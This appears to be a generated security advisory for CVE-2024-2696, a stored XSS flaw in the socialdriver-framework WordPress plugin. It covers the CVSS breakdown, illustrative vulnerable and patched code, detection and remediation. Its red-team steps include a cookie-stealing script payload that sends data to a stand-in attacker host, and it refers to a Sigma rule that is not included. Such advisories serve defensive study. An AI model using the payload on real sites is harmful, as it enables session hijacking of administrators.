CVE-2024-2696
Executive Summary
CVE-2024-2696 is a Stored Cross-Site Scripting (XSS) vulnerability in the socialdriver-framework WordPress plugin. The plugin fails to properly sanitize and escape certain settings before saving them, allowing high-privilege users (e.g., administrators) to inject arbitrary JavaScript. This attack can succeed even when the unfiltered_html capability is disallowed, such as in a multisite WordPress installation. The vulnerability affects all versions prior to 2024.04.30. No public exploit code or proof-of-concept is currently available, but the risk is elevated due to the prevalence of WordPress multisite deployments.

Supply Chain & Package Security
This vulnerability resides in a WordPress plugin distributed via the official WordPress plugin repository. Users should verify the integrity of the plugin update by checking the plugin’s checksum or signature if provided. No third-party package manager (NPM, PyPI, Go, Ruby) is involved.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- Base Score: 4.8 (Medium)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High (Admin)
- User Interaction: Required (Victim must visit the admin page)
- Scope: Changed (XSS can affect other users)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. Exploitation requires admin-level access, but in a multisite environment, a site administrator can compromise other sites or super admins.
Deep Dive & Mechanics
The vulnerability exists in the plugin’s settings page. The plugin stores user-supplied values (likely in the WordPress options table) without proper sanitization or output escaping. When an admin saves a malicious payload (e.g., <script>alert('XSS')</script>) into a setting field, the payload is stored in the database. Later, when the settings page is rendered, the payload is echoed back without escaping, causing the browser to execute the script.
In a multisite setup, the unfiltered_html capability is typically disallowed for site administrators to prevent them from injecting arbitrary HTML/JS. However, because the plugin does not apply its own sanitization, the stored XSS bypasses this restriction. The attack can be used to steal cookies, perform actions on behalf of the victim, or redirect to malicious sites.
Vulnerable vs. Patched Code
Vulnerable Code (before 2024.04.30):
// In settings registration
register_setting( 'socialdriver_settings', 'socialdriver_option', 'sanitize_text_field' );
// In settings field rendering
echo '<input type="text" name="socialdriver_option" value="' . get_option( 'socialdriver_option' ) . '" />';
The sanitize_text_field function strips tags but does not prevent stored XSS if the output is not escaped. The get_option() value is directly echoed without esc_attr().
Patched Code (2024.04.30):
// In settings field rendering
echo '<input type="text" name="socialdriver_option" value="' . esc_attr( get_option( 'socialdriver_option' ) ) . '" />';
The esc_attr() function encodes special characters, preventing XSS. Additionally, the plugin may now use wp_kses() or similar for richer content fields.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- Admin access to a WordPress site running socialdriver-framework < 2024.04.30.
- The target site must have the plugin’s settings page accessible.
Steps:
- Log in as an administrator.
- Navigate to the plugin’s settings page (e.g.,
/wp-admin/admin.php?page=socialdriver-settings). - In a vulnerable text field, enter a payload such as:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the settings.
- When another admin (or the same admin) visits the settings page, the script executes, exfiltrating cookies.
Expected Outcome: The attacker obtains the victim’s session cookie, allowing session hijacking.
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual changes to the
socialdriver_optionWordPress option in the database. - Look for HTTP requests to the plugin’s settings page containing
<script>oronerror=patterns. - Use the Sigma rule below to detect the attack in web server logs.
Hardening:
- Update the plugin to version 2024.04.30 or later.
- Restrict admin access to trusted users only.
- Implement a Web Application Firewall (WAF) rule to block XSS payloads in plugin settings.
Indicators of Compromise (IOCs)
- File:
/wp-content/plugins/socialdriver-framework/socialdriver-framework.php(check version string) - Database Option:
socialdriver_optioncontaining JavaScript payloads - Network: Outbound HTTP requests to attacker-controlled domains from the WordPress admin panel
- Logs: Web server logs showing
GET /wp-admin/admin.php?page=socialdriver-settingswithsocialdriver_optionparameter containing<script>tags

Remediation & Mitigation
Immediate:
- Update the socialdriver-framework plugin to version 2024.04.30 or later.
- If unable to update, disable the plugin until a patch can be applied.
Long-term:
- Enforce the principle of least privilege for WordPress admin users.
- Regularly audit plugin code for security vulnerabilities.
- Use a WordPress security plugin that monitors for XSS attempts.
